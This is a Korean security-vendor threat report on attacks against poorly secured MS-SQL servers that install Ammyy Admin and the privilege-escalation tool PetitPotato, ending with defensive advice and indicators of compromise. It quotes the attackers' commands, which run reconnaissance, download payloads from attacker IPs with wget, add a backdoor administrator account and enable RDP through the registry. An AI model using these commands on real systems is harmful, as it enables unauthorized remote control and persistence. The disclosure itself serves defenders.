Ammyy Admin을 설치하는 MS-SQL 서버 대상 공격 사례

AhnLab SEcurity intelligence Center(ASEC)은 최근 부적절하게 관리되고 있는 MS-SQL 서버를 대상으로 Ammyy Admin을 설치하는 공격 사례를 확인하였다. Ammyy Admin은 원격 제어 도구로서 AnyDesk나 ToDesk, TeamViwer 등과 함께 원격에서 시스템을 제어하기 위한 목적으로 사용된다.

이러한 도구들은 정상적으로 사용할 경우 기업 및 개인이 원격에 위치한 시스템들을 관리하고 제어할 수 있다. 하지만 원격에서 시스템을 제어할 수 있는 기능은 백도어 및 RAT 악성코드가 제공하는 것과 동일하기 때문에 공격자가 이를 악용할 수도 있다. 실제 MS-SQL 서버를 대상으로 하는 공격 사례에서도 AnyDesk가 많이 악용되는데 [1] ASEC에서는 이외에도 GotoHTTP를 악용한 공격 사례를 확인해 공개한 바 있다. [2]

윈도우 시스템 기준 MS-SQL 서버는 대표적인 공격 대상이다. 공격자들은 부적절하게 관리되고 있는 취약한 MS-SQL 서버들을 대상으로 스캐닝한 후 제어 획득에 성공할 경우 악성코드를 설치한다. 공격 대상이 된 시스템은 외부에 공개되어 있으며 취약한 자격 증명 정보를 사용하는 것으로 추정된다. 공격자는 공격에 성공한 이후 다음과 같은 명령들을 실행해 감염 시스템에 대한 정보들을 수집하였다.

> whoami > net1  user > netstat  -an > wmic  cpu get name,NumberOfCores

Figure 1. 명령 실행 로그

이후 WGet을 설치하고 이를 이용해 추가 악성코드들을 설치하였다. 설치된 악성코드들로는 Ammyy Admin(mscorsvw.exe), Ammyy Admin의 설정 파일(settings3.bin) 그리고 PetitPotato(p.ax)가 있다.

> %USERPROFILE%\Libraries\get.exe  -O c:\Users\%ASD%\Libraries\mscorsvw.exe  hxxp://110.45.186[.]8/aa_v3_protected.exe > %USERPROFILE%\Libraries\get.exe  -O c:\Users\%ASD%\Libraries\mscorsvw.exe  hxxp://110.45.186[.]8/mscorsvw.log > %USERPROFILE%\Libraries\get.exe  -O c:\Users\%ASD%\Libraries\mscorsvw.exe  hxxp://1.220.228[.]82/mscorsvw1.log > %USERPROFILE%\Libraries\get.exe  -O c:\Users\%ASD%\Libraries\settings3.bin hxxp://1.220.228[.]82/settings3.bin > %USERPROFILE%\Libraries\get.exe  -O c:\Users\%ASD%\Libraries\p.ax hxxp://110.45.186[.]8/p.log

Ammyy Admin은 다른 원격 제어 도구들과 동일하게 원격 화면 제어를 제공하는 도구로서 감염 시스템에 Ammyy Admin을 설치한 후 “Client ID”와 “Password”를 알 수 있다면 이를 이용해 원격에서 시스템을 제어할 수 있다.

Figure 2. Ammyy Admin을 이용한 원격 제어

공격에 사용된 Ammyy Admin은 v3.10과 같이 오래된 버전인데 이러한 유형은 악용할 수 있는 방식이 알려져 있다. 먼저 다음과 같이 모든 Computer에서 직접 지정한 비밀번호로 로그인할 수 있도록 설정한다. 이후 생성된 설정 파일 “settings3.bin”을 감염 시스템의 Ammyy Admin의 설정 파일로 사용할 경우 공격자는 “Client ID”만 알면 감염 시스템을 원격에서 제어할 수 있다. 공개된 악용 기법에서는 메모리에서 “Client ID”를 추출하여 사용하는데 실제 공격자가 사용한 구체적인 방식은 확인되지 않는다.

Figure 3. 공격자가 유포한 Ammyy Admin 설정 파일

이외에도 감염 시스템에 원격 데스크톱으로 접속하려고 시도하였다. 공격자는 이를 위해 권한 상승 도구인 PetitPotato를 악용해 새로운 사용자를 추가한 후 RDP 서비스를 활성화하였다.

> %USERPROFILE%\Libraries\p.ax  0 “net1 user a 12[제거]C!@# /ad” > reg  add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

MS-SQL 서버를 대상으로 하는 공격에는 대표적으로 부적절하게 계정 정보를 관리하고 있는 시스템들에 대한 무차별 대입 공격(Brute Forcing)과 사전 공격(Dictionary Attack)이 있다. 관리자들은 계정의 비밀번호를 추측하기 어려운 형태로 사용하고 주기적으로 변경하여 무차별 대입 공격과 사전 공격으로부터 데이터베이스 서버를 보호해야 한다.

그리고 V3를 최신 버전으로 업데이트하여 악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다. 또한 외부에 공개되어 접근 가능한 데이터베이스 서버에 대해 방화벽과 같은 보안 제품을 이용해 외부 공격자로부터의 접근을 통제해야 한다. 위와 같은 조치가 선행되지 않을 경우 공격자 및 악성코드들에 의해 계속적인 감염이 이루어질 수 있다.

 

MD5

1c9c3b4a2753ecab833621701e1b492c

55f4a1393e2edafea92d7ebab09c92d6

753f5e2fc5bdbc9b2175913d3b883580

b3b9eb83af47770dbb8e86f95afe9634

URL

http[:]//1[.]220[.]228[.]82/aa_v3_protected[.]exe

http[:]//1[.]220[.]228[.]82/c[.]exe

http[:]//1[.]220[.]228[.]82/mscorsvw[.]log

http[:]//1[.]220[.]228[.]82/mscorsvw1[.]log

http[:]//1[.]220[.]228[.]82/p[.]log